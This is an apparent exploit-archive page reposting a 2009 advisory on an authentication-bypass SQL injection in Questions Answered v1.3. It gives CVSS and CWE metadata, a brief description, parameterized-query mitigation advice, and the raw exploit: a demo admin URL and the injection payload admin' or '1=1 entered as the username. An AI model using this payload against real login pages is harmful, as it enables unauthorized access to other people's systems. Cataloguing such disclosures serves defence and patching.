header-logo
Suggest Exploit
vendor:
Questions Answered
by:
Snakespc ALGERIAN HaCkEr
9,3
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: Questions Answered
Affected Version From: v1.3
Affected Version To: v1.3
Patch Exists: NO
Related CWE: N/A
CPE: a:questions_answered:questions_answered:1.3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Questions Answered v1.3 (Auth Bypass) Remote Sql Injection

Questions Answered v1.3 is vulnerable to a remote SQL injection vulnerability. An attacker can exploit this vulnerability by sending malicious SQL queries to the application. This can allow an attacker to bypass authentication and gain access to the application.

Mitigation:

Input validation should be used to prevent malicious SQL queries from being sent to the application. Additionally, the application should use parameterized queries to prevent SQL injection.
Source

Exploit-DB raw data:

#--------------------------------------------------------
#Questions Answered v1.3 (Auth Bypass) Remote Sql Injection
#--------------------------------------------------------
#Discovered By: Snakespc     ALGERIAN HaCkEr 
#Mail: snakespc@gmail.com       
#-------------------------------------------------------
#
#Script:Questions Answered v1.3
#
#Demo:www.nichewebsite.net
#--------------------------------------------------------
#Exploit:
#--------
#Demo:http://demo.nichewebsite.net/admin
#Username:admin' or '1=1 
#Password:Super Cristal
----------------------------------------------------------

# milw0rm.com [2009-08-03]

Navigation

Suggest Exploit

Services By CQR